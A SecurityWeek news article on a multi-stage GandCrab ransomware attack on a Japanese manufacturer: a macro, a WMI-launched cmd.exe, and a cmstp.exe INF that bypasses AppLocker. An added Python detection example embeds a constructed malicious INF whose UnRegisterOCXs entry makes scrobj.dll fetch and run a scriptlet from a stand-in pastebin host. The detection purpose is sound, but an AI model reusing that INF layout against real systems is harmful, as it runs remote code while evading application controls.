GandCrab Ransomware Detected Targeting Manufacturing Firm

GandCrab, once known as a consumer-targeting ransomware, is increasingly being used in attacks against business organizations

2018 was dominated by two strains of malware: GandCrab for consumers and SamSam for businesses. Both were hugely successful for the hackers — GandCrab for its continuous development and relatively low cost; and SamSam because of its developers’ ability to infiltrate and cripple large networks.

Since the end of 2018, when the U.S. indicted two Iranian citizens for their involvement with SamSam, that strain has all but disappeared. The business model of infecting larger organizations for a larger payout remains attractive, however, and GandCrab is beginning to be used by other actors against businesses. Now Cybereason has detected a new example: an evasive, multi-stage infection chain delivering GandCrab to an unnamed Japanese manufacturing business.

The Norsk Hydro incident in March 2019 demonstrates how effective a successful ransomware attack against manufacturing can be. Although the attackers did not reach the OT side of Norsk Hydro's network, the attack still shut down plants by disrupting the IT systems used to control them. The incident has cost the firm approximately $52 million. The cost is far higher when ransomware does reach the OT side of the corporate network, as WannaCry did at Taiwan chip manufacturer TSMC, where it cost an estimated $250 million.

Criminals bank on manufacturers' willingness to pay perhaps a few hundred thousand dollars rather than face recovery costs running into millions, which is what Jackson County, Georgia, chose to do when it was infected by the Ryuk ransomware.

GandCrab is ransomware-as-a-service (RaaS). As soon as security firms develop a decryptor, the developers release a new version. At the time of the attack against the Japanese firm there was no way to recover files encrypted by the current version without paying the ransom (or restoring from backups).

This new attack starts with a poisoned Korean-language Office document. The poison is an embedded, obfuscated macro triggered by a GotFocus event on an embedded control rather than by the AutoOpen/Document_Open handlers that macro scanners usually look for. The macro decrypts a multi-stage downloader that creates a WMI object, which in turn spawns a cmd.exe instance carrying further commands; launching through WMI means cmd.exe is not a direct child of the Office process, breaking the parent/child relationship that many detections key on. Those commands write an INF configuration file and hand it to cmstp.exe (the signed Microsoft Connection Manager Profile Installer) in a variation of the Squiblydoo technique that bypasses Windows AppLocker.

cmstp.exe then connects to a pastebin URL to download the secondary payload: a scriptlet (.sct) containing obfuscated JavaScript that embeds GandCrab. The ransomware is decrypted and dropped to disk at runtime.

“The [pastebin] URL and the page content seem to be undetected by antivirus vendors on VirusTotal,” say the researchers, suggesting that detection of this attack requires behavioral analysis rather than signature detection. The ransom note produced by a successful attack states that the malware is GandCrab version 5.2. Decryptors are currently available only for versions 1, 4 and 5 up to 5.1.
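As an added illustration of the behavioural detection the researchers allude to, the Python below runs two rules over constructed process-creation events shaped like Sysmon/EDR telemetry: a cmd.exe instance launched under WmiPrvSE.exe that writes an INF file, and cmstp.exe silently installing an INF that either sits in a user-writable directory or registers a remote scriptlet. This is example code written for this page, not Cybereason's detection logic and not anything reproduced from the original article. The event data, the INF contents, the pastebin.example URL, and the assumption that the macro's WMI call makes WmiPrvSE.exe (not WINWORD.EXE) the parent of cmd.exe are all constructed for the example; the malicious INF layout follows the publicly documented cmstp.exe scriptlet technique (an [UnRegisterOCXs] list handed to scrobj.dll), which the article describes only as a Squiblydoo variant without showing the file.

```python
import re

# Constructed process-creation events (pid, ppid, image, command line), not real telemetry.
# Assumption: the macro's WMI call makes WmiPrvSE.exe the parent of cmd.exe, so a plain
# Office -> cmd.exe parent/child rule would miss this chain.
SAMPLE_EVENTS = [
    {"pid": 1001, "ppid": 400, "image": r"C:\Program Files\Microsoft Office\WINWORD.EXE", "cmdline": r"WINWORD.EXE /n invoice.doc"},
    {"pid": 1002, "ppid": 600, "image": r"C:\Windows\System32\wbem\WmiPrvSE.exe", "cmdline": r"WmiPrvSE.exe -secured -Embedding"},
    {"pid": 1003, "ppid": 1002, "image": r"C:\Windows\System32\cmd.exe", "cmdline": r"cmd.exe /c echo [version] > C:\Users\user\AppData\Local\Temp\abc.inf"},
    {"pid": 1004, "ppid": 1003, "image": r"C:\Windows\System32\cmstp.exe", "cmdline": r"cmstp.exe /ni /s C:\Users\user\AppData\Local\Temp\abc.inf"},
    # Benign comparison: a connection-manager profile installed from a program directory.
    {"pid": 1005, "ppid": 700, "image": r"C:\Windows\System32\cmstp.exe", "cmdline": r"cmstp.exe /s C:\CorpVPN\corpvpn.inf"},
]

# Constructed INF contents keyed by lower-case path, standing in for what an EDR reads back from disk.
# Malicious layout: the install section's UnRegisterOCXs key names a section whose entries are passed
# to scrobj.dll, which fetches and executes the remote .sct. The URL is a placeholder, not the real one.
MALICIOUS_INF = r"""
[version]
Signature=$chicago$

[DefaultInstall_SingleUser]
UnRegisterOCXs=UnRegisterOCXSection

[UnRegisterOCXSection]
%11%\scrobj.dll,NI,https://pastebin.example/raw/constructed

[Strings]
ServiceName="Example"
"""

BENIGN_INF = r"""
[version]
Signature=$chicago$

[DefaultInstall]
CopyFiles=CorpVPN.Files

[CorpVPN.Files]
corpvpn.cms
"""

SAMPLE_INF_FILES = {
    r"c:\users\user\appdata\local\temp\abc.inf": MALICIOUS_INF,
    r"c:\corpvpn\corpvpn.inf": BENIGN_INF,
}

URL_RE = re.compile(r"https?://[^\s,\"']+", re.IGNORECASE)
USER_WRITABLE = ("\\users\\", "\\temp\\", "\\appdata\\", "\\programdata\\")


def parse_inf(text):
    """Minimal INF/INI parser: {section (lower-case): [non-empty lines]}; ';' comments stripped."""
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.split(";", 1)[0].strip()
        if not line:
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].strip().lower()
            sections[current] = []
        elif current is not None:
            sections[current].append(line)
    return sections


def remote_scriptlets(inf_text):
    """URLs inside any section that an install section names via RegisterOCXs/UnRegisterOCXs."""
    sections = parse_inf(inf_text)
    targets = set()
    for lines in sections.values():
        for line in lines:
            key, sep, value = line.partition("=")
            if sep and key.strip().lower() in ("registerocxs", "unregisterocxs"):
                targets.add(value.strip().lower())
    urls = []
    for name in targets:
        for line in sections.get(name, []):
            urls.extend(URL_RE.findall(line))
    return urls


def _basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def detect(events, inf_files):
    """Return [(pid, reason)] for the two behaviours in this chain worth alerting on."""
    by_pid = {e["pid"]: e for e in events}
    alerts = []
    for e in events:
        name = _basename(e["image"])
        parent = by_pid.get(e["ppid"])
        # Rule 1: cmd.exe launched via WMI that writes an INF file (the staging step).
        if (name == "cmd.exe" and parent and _basename(parent["image"]) == "wmiprvse.exe"
                and ".inf" in e["cmdline"].lower()):
            alerts.append((e["pid"], "wmi_spawned_cmd_writes_inf"))
        # Rule 2: cmstp.exe silently installing an INF from a user-writable path, or one whose
        # RegisterOCXs/UnRegisterOCXs entries point at a remote scriptlet (the AppLocker bypass).
        if name == "cmstp.exe":
            tokens = e["cmdline"].lower().split()
            inf_path = next((t for t in tokens if t.endswith(".inf")), None)
            if inf_path and "/s" in tokens:
                reasons = []
                if any(marker in inf_path for marker in USER_WRITABLE):
                    reasons.append("inf_in_user_writable_path")
                urls = remote_scriptlets(inf_files.get(inf_path, ""))
                if urls:
                    reasons.append("inf_registers_remote_scriptlet:" + ",".join(urls))
                if reasons:
                    alerts.append((e["pid"], "cmstp_inf_abuse|" + "|".join(reasons)))
    return alerts


if __name__ == "__main__":
    for pid, reason in detect(SAMPLE_EVENTS, SAMPLE_INF_FILES):
        print(pid, reason)
```

Running the file prints one alert for the WMI-spawned cmd.exe and one for cmstp.exe, and nothing for the legitimate profile install. The point is that a signature on the pastebin page or the scriptlet is defeated the moment the payload is re-hosted or re-obfuscated, while the INF handed to cmstp.exe and the WMI lineage survive that change; in production the second rule should also be fed the INF content from file-creation telemetry rather than a lookup table.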

The relatively new use of GandCrab against businesses does not indicate a change of policy by its developers. Because they lease the ransomware as a service, it remains available to the less skilled hackers who use spray-and-pray delivery against consumers.

“Also, since GandCrab is a RaaS model, the threat actors who ‘lease’ the service can target whomever they want. So, it’s difficult to assign collective intention/trend, since we are talking about an unknown number of potential threat actors,” Assaf Dahan, Cybereason’s senior director and head of threat research, told SecurityWeek. However, its growing adoption by more skilled hackers is a new threat to business.

“There have been many large enterprises and recognizable corporate brands hit by ransomware in the past year, some in the manufacturing industry,” continued Dahan. “In general, the threat actors are carrying out more targeted campaigns against many companies across a wide spectrum of industries. A persistent, motivated hacker will eventually succeed in breaking through a corporate defense, making it critical for enterprises to be able to respond quickly, to turn back the threat. Any significant latency in the time of breach and response leads to trouble.”

Related: SamSam and GandCrab Illustrate Evolution of Ransomware 

Related: GandCrab: The New King of Ransomware? 

Related: GandCrab Ransomware Spreads Via NSA Exploit 

Related: Malware Activity Slows, But Attacks More Sophisticated: Report

Written By

Kevin Townsend is a Senior Contributor at SecurityWeek. He has been writing about high tech issues since before the birth of Microsoft. For the last 15 years he has specialized in information security; and has had many thousands of articles published in dozens of different magazines – from The Times and the Financial Times to current and long-gone computer magazines.
